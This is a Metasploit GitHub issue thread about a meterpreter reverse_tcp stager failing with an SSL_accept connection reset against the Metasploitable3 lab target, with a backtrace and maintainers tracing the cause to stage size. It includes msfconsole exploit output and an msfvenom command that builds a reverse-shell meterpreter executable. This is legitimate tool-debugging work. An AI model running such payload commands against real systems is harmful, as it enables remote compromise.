
Stager fails to load using windows/meterpreter/reverse_tcp with badchars = '\0x00' #7487

Closed
wchen-r7 opened this issue Oct 24, 2016 · 5 comments · Fixed by #7493

Comments


wchen-r7 commented Oct 24, 2016

While testing this vulnerability for Metasploitable3, James and I are noticing windows/meterpreter/reverse_tcp is always causing this error:

Errno::ECONNRESET Connection reset by peer - SSL_accept

msfconsole output:

msf exploit(manageengine_connectionid_write) > run

[*] Started reverse TCP handler on 192.168.1.221:4444 
[*] Creating JSP stager
[*] Uploading JSP stager rjWLG.jsp...
[*] Executing stager...
[*] Sending stage (983599 bytes) to 192.168.1.223
[-] Errno::ECONNRESET Connection reset by peer - SSL_accept

The backtrace:

[10/24/2016 15:08:30] [e(0)] core: Exception raised from handle_connection: Errno::ECONNRESET: Connection reset by peer - SSL_accept

/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/client.rb:178:in `accept'
/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/client.rb:178:in `swap_sock_plain_to_ssl'
/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/client.rb:156:in `init_meterpreter'
/Users/sinn3r/rapid7/msf/lib/msf/base/sessions/meterpreter.rb:78:in `initialize'
/Users/sinn3r/rapid7/msf/lib/msf/base/sessions/meterpreter_x86_win.rb:16:in `initialize'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler.rb:202:in `new'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler.rb:202:in `create_session'
/Users/sinn3r/rapid7/msf/lib/msf/core/payload/stager.rb:236:in `handle_connection_stage'
/Users/sinn3r/rapid7/msf/lib/msf/core/payload/stager.rb:222:in `handle_connection'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler/reverse_tcp.rb:139:in `block (2 levels) in start_handler'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler/reverse_tcp.rb:116:in `loop'
/Users/sinn3r/rapid7/msf/lib/msf/core/handler/reverse_tcp.rb:116:in `block in start_handler'
/Users/sinn3r/rapid7/msf/lib/msf/core/thread_manager.rb:100:in `block in spawn'

If we use windows/shell_reverse_tcp, the payload session works properly. So at first glance, the problem seems more specific to meterpreter.

bcook-r7 (Contributor) commented:

I can reproduce, checking it out now.

bcook-r7 (Contributor) commented:

Looks related to the size of the stage. If I shrink it by 32k (removing some code), it works.

bcook-r7 (Contributor) commented:

This started failing around metasploit-payloads 1.1.21 or so, when adding the localtime command. That seems to have pushed the size over the threshold.

bcook-r7 (Contributor) commented:

PR submitted for the original issue, but this can be reproduced more directly (will update the title)

./msfvenom -p windows/meterpreter/reverse_tcp -f exe -o ../metasploitable3/test.exe LHOST=172.28.128.1 -b '\x00'

bcook-r7 changed the title from "Errno::ECONNRESET Connection reset by peer - SSL_accept while using windows/meterpreter/reverse_tcp" to "Stager fails to load using windows/meterpreter/reverse_tcp with badchars = '\0x00'" on Oct 26, 2016.

bcook-r7 (Contributor) commented:

Darn it, debug info being enabled by default seems to have caused the underlying problem (itself also a not-quite-explainable problem yet, but it does at least have a more general fix). Thanks @megabug for noticing this.
